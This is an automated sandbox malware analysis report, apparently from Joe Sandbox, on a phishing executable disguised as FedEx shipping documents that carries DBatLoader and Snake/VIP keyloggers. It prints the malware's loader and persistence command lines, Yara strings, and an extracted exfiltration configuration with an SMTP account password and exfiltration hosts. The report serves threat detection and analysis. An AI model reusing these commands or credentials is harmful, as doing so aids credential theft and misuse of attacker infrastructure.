Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Overview

General Information

Sample name:FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe
Analysis ID:1617727
MD5:f6118d60f7bf36f088b6b7a2c27624fb
SHA1:7eff62e10421088c83d4c74fd8d4f54e145a6b97
SHA256:0009a5bb1bb1542c3663bc48457b7391c940ad8284d92996fa8a058fc4b5a8cc
Tags:exeFedExuser-abuse_ch
Infos:

Detection

DBatLoader, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Allocates many large memory junks
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Rundll32 Activity
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe (PID: 7376 cmdline: "C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe" MD5: F6118D60F7BF36F088B6B7A2C27624FB)
    • cmd.exe (PID: 7524 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\MxhvdwzhF.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7580 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\\Mxhvdwzh46.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • extrac32.exe (PID: 7640 cmdline: extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pif MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • ndpha.pif (PID: 7724 cmdline: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif MD5: 889B99C52A60DD49227C5E485A016679)
    • hzwdvhxM.pif (PID: 7632 cmdline: C:\Users\Public\Libraries\hzwdvhxM.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • Mxhvdwzh.PIF (PID: 7948 cmdline: "C:\Users\Public\Libraries\Mxhvdwzh.PIF" MD5: F6118D60F7BF36F088B6B7A2C27624FB)
    • hzwdvhxM.pif (PID: 8004 cmdline: C:\Users\Public\Libraries\hzwdvhxM.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • Mxhvdwzh.PIF (PID: 8112 cmdline: "C:\Users\Public\Libraries\Mxhvdwzh.PIF" MD5: F6118D60F7BF36F088B6B7A2C27624FB)
    • hzwdvhxM.pif (PID: 8172 cmdline: C:\Users\Public\Libraries\hzwdvhxM.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x3599e:$a1: get_encryptedPassword
        • 0x35972:$a2: get_encryptedUsername
        • 0x35a36:$a3: get_timePasswordChanged
        • 0x3594e:$a4: get_passwordField
        • 0x359b4:$a5: set_encryptedPassword
        • 0x35781:$a7: get_logins
        • 0x30fe8:$a10: KeyLoggerEventArgs
        • 0x30fb7:$a11: KeyLoggerEventArgsEventHandler
        • 0x35855:$a13: _encryptedPassword
        00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmpMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
        • 0x3fbf3:$a2: \Comodo\Dragon\User Data\Default\Login Data
        • 0x3f296:$a3: \Google\Chrome\User Data\Default\Login Data
        • 0x3f4f3:$a4: \Orbitum\User Data\Default\Login Data
        • 0x3fed2:$a5: \Kometa\User Data\Default\Login Data
        Click to see the 87 entries
        SourceRuleDescriptionAuthorStrings
        12.2.hzwdvhxM.pif.400000.2.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1e9d0:$s5: delete[]
        • 0x1de88:$s6: constructor or from DllMain.
        12.2.hzwdvhxM.pif.400000.2.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x1300:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1fdd0:$s5: delete[]
        • 0x1f288:$s6: constructor or from DllMain.
        0.2.FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe.2189b7a8.9.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1e9d0:$s5: delete[]
        • 0x1de88:$s6: constructor or from DllMain.
        7.2.hzwdvhxM.pif.400000.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x1300:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1fdd0:$s5: delete[]
        • 0x1f288:$s6: constructor or from DllMain.
        12.2.hzwdvhxM.pif.438038.1.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
        • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
        • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
        • 0x700:$s3: 83 EC 38 53 B0 6A 88 44 24 2B 88 44 24 2F B0 A0 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
        • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
        • 0x1e9d0:$s5: delete[]
        • 0x1de88:$s6: constructor or from DllMain.
        Click to see the 240 entries

        System Summary

        barindex
        Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, ProcessId: 7376, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\hzwdvhxM.pif, CommandLine: C:\Users\Public\Libraries\hzwdvhxM.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\hzwdvhxM.pif, NewProcessName: C:\Users\Public\Libraries\hzwdvhxM.pif, OriginalFileName: C:\Users\Public\Libraries\hzwdvhxM.pif, ParentCommandLine: "C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe", ParentImage: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, ParentProcessId: 7376, ParentProcessName: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, ProcessCommandLine: C:\Users\Public\Libraries\hzwdvhxM.pif, ProcessId: 7632, ProcessName: hzwdvhxM.pif
        Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Mxhvdwzh.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, ProcessId: 7376, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mxhvdwzh
        Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 132.226.8.169, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Users\Public\Libraries\hzwdvhxM.pif, Initiated: true, ProcessId: 7632, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49706
        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Mxhvdwzh.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, ProcessId: 7376, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Mxhvdwzh
        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\hzwdvhxM.pif, CommandLine: C:\Users\Public\Libraries\hzwdvhxM.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\hzwdvhxM.pif, NewProcessName: C:\Users\Public\Libraries\hzwdvhxM.pif, OriginalFileName: C:\Users\Public\Libraries\hzwdvhxM.pif, ParentCommandLine: "C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe", ParentImage: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, ParentProcessId: 7376, ParentProcessName: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, ProcessCommandLine: C:\Users\Public\Libraries\hzwdvhxM.pif, ProcessId: 7632, ProcessName: hzwdvhxM.pif
        Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif , CommandLine: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif , CommandLine|base64offset|contains: , Image: C:\Users\Public\ndpha.pif, NewProcessName: C:\Users\Public\ndpha.pif, OriginalFileName: C:\Users\Public\ndpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\\Mxhvdwzh46.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7580, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif , ProcessId: 7724, ProcessName: ndpha.pif
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-18T08:12:04.867095+010028033053Unknown Traffic192.168.2.849708104.21.32.1443TCP
        2025-02-18T08:12:07.875038+010028033053Unknown Traffic192.168.2.849712104.21.32.1443TCP
        2025-02-18T08:12:14.222939+010028033053Unknown Traffic192.168.2.849723104.21.32.1443TCP
        2025-02-18T08:12:18.054248+010028033053Unknown Traffic192.168.2.849729104.21.32.1443TCP
        2025-02-18T08:12:20.129975+010028033053Unknown Traffic192.168.2.849731104.21.32.1443TCP
        2025-02-18T08:12:22.221609+010028033053Unknown Traffic192.168.2.849733104.21.32.1443TCP
        2025-02-18T08:12:28.510972+010028033053Unknown Traffic192.168.2.849741104.21.32.1443TCP
        2025-02-18T08:12:32.240492+010028033053Unknown Traffic192.168.2.849750104.21.32.1443TCP
        2025-02-18T08:12:34.577920+010028033053Unknown Traffic192.168.2.849755104.21.32.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-18T08:12:02.721265+010028032742Potentially Bad Traffic192.168.2.849706132.226.8.16980TCP
        2025-02-18T08:12:04.326141+010028032742Potentially Bad Traffic192.168.2.849706132.226.8.16980TCP
        2025-02-18T08:12:06.029153+010028032742Potentially Bad Traffic192.168.2.849709132.226.8.16980TCP
        2025-02-18T08:12:07.295005+010028032742Potentially Bad Traffic192.168.2.849711132.226.8.16980TCP
        2025-02-18T08:12:16.021871+010028032742Potentially Bad Traffic192.168.2.849725132.226.8.16980TCP
        2025-02-18T08:12:17.521877+010028032742Potentially Bad Traffic192.168.2.849725132.226.8.16980TCP
        2025-02-18T08:12:19.521839+010028032742Potentially Bad Traffic192.168.2.849730132.226.8.16980TCP
        2025-02-18T08:12:26.389767+010028032742Potentially Bad Traffic192.168.2.849735132.226.8.16980TCP
        2025-02-18T08:12:27.952232+010028032742Potentially Bad Traffic192.168.2.849735132.226.8.16980TCP
        2025-02-18T08:12:29.499153+010028032742Potentially Bad Traffic192.168.2.849742132.226.8.16980TCP
        2025-02-18T08:12:30.921014+010028032742Potentially Bad Traffic192.168.2.849746132.226.8.16980TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-02-18T08:12:16.817919+010018100071Potentially Bad Traffic192.168.2.849727149.154.167.220443TCP
        2025-02-18T08:12:33.138593+010018100071Potentially Bad Traffic192.168.2.849752149.154.167.220443TCP
        2025-02-18T08:12:39.879753+010018100071Potentially Bad Traffic192.168.2.849762149.154.167.220443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 00000007.00000002.3932898237.000000002C440000.00000004.08000000.00040000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587", "Version": "4.4"}
        Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "phatbills@xma0.com", "Password": "london@1759", "Host": "mail.xma0.com", "Port": "587", "Version": "4.4"}
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFReversingLabs: Detection: 64%
        Source: C:\Users\Public\Libraries\Mxhvdwzh.PIFVirustotal: Detection: 62%Perma Link
        Source: C:\Windows \SysWOW64\NETUTILS.dllReversingLabs: Detection: 36%
        Source: C:\Windows \SysWOW64\NETUTILS.dllVirustotal: Detection: 33%Perma Link
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeReversingLabs: Detection: 64%
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeVirustotal: Detection: 62%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
        Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpackString decryptor: phatbills@xma0.com
        Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpackString decryptor: london@1759
        Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpackString decryptor: mail.xma0.com
        Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpackString decryptor: phatbills2@xma0.com
        Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpackString decryptor: 587
        Source: 12.2.hzwdvhxM.pif.259d1216.4.raw.unpackString decryptor:

        Location Tracking

        barindex
        Source: unknownDNS query: name: reallyfreegeoip.org
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D628C00 CryptUnprotectData,7_2_2D628C00
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 7_2_2D629361 CryptUnprotectData,7_2_2D629361

        Compliance

        barindex
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifUnpacked PE file: 7.2.hzwdvhxM.pif.400000.1.unpack
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifUnpacked PE file: 12.2.hzwdvhxM.pif.400000.2.unpack
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifUnpacked PE file: 14.2.hzwdvhxM.pif.400000.0.unpack
        Source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49707 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49728 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.8:49738 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49727 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49752 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49762 version: TLS 1.2
        Source: Binary string: \??\C:\Windows\System.Windows.Forms.pdb source: hzwdvhxM.pif, 00000007.00000003.1866438603.000000002792E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Windows.Forms.pdb source: hzwdvhxM.pif, 00000007.00000003.1866438603.0000000027956000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3928553785.0000000028AAC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Windows.Forms.pdbt source: hzwdvhxM.pif, 00000007.00000003.1866438603.0000000027956000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3928553785.0000000028AAC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Windows.Forms.pdb/ source: hzwdvhxM.pif, 00000007.00000003.1866438603.000000002792E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ab.Pdb.T`b.# source: hzwdvhxM.pif, 0000000E.00000003.1919890397.000000002E620000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: easinvoker.pdb source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1498803123.0000000020B60000.00000004.00001000.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435295037.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, Mxhvdwzh.PIF, 0000000B.00000002.1593207176.00000000025DF000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.0.dr
        Source: Binary string: _.pdb source: hzwdvhxM.pif, 00000007.00000003.1467552479.000000002792F000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3932322793.000000002BDF0000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 00000007.00000002.3927113421.00000000293E0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000003.1592650424.0000000023E4C000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927698614.0000000025990000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000C.00000002.3927909311.0000000025C20000.00000004.08000000.00040000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3930139292.000000002A5C0000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000003.1679054721.0000000028ABC000.00000004.00000020.00020000.00000000.sdmp, hzwdvhxM.pif, 0000000E.00000002.3935796158.000000002CEE0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: rundll32.pdb source: ndpha.pif, ndpha.pif, 00000009.00000002.1471168514.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, ndpha.pif.8.dr
        Source: Binary string: rundll32.pdbGCTL source: ndpha.pif, 00000009.00000002.1471168514.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, ndpha.pif.8.dr
        Source: Binary string: easinvoker.pdbGCTL source: FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1446686847.000000000072A000.00000004.00000020.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000002.1498803123.0000000020B60000.00000004.00001000.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1446686847.0000000000759000.00000004.00000020.00020000.00000000.sdmp, FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe, 00000000.00000003.1435295037.000000007EE40000.00000004.00001000.00020000.00000000.sdmp, Mxhvdwzh.PIF, 0000000B.00000002.1593207176.00000000025DF000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.0.dr
        Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exeCode function: 0_2_02D5534C GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02D5534C
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D43D09Ch7_2_2D43CDF0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D433326h7_2_2D432F08
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D432D5Ch7_2_2D432AA8
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D43FC0Ch7_2_2D43F960
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D43F7B4h7_2_2D43F508
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_2D430040
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_2D430856
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D43EF04h7_2_2D43EC58
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D43EAACh7_2_2D43E800
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D43F35Ch7_2_2D43F0B0
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D43E1FCh7_2_2D43DF50
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D430D10h7_2_2D430B30
        Source: C:\Users\Public\Libraries\hzwdvhxM.pifCode function: 4x nop then jmp 2D4316FBh7_2_2D430B30
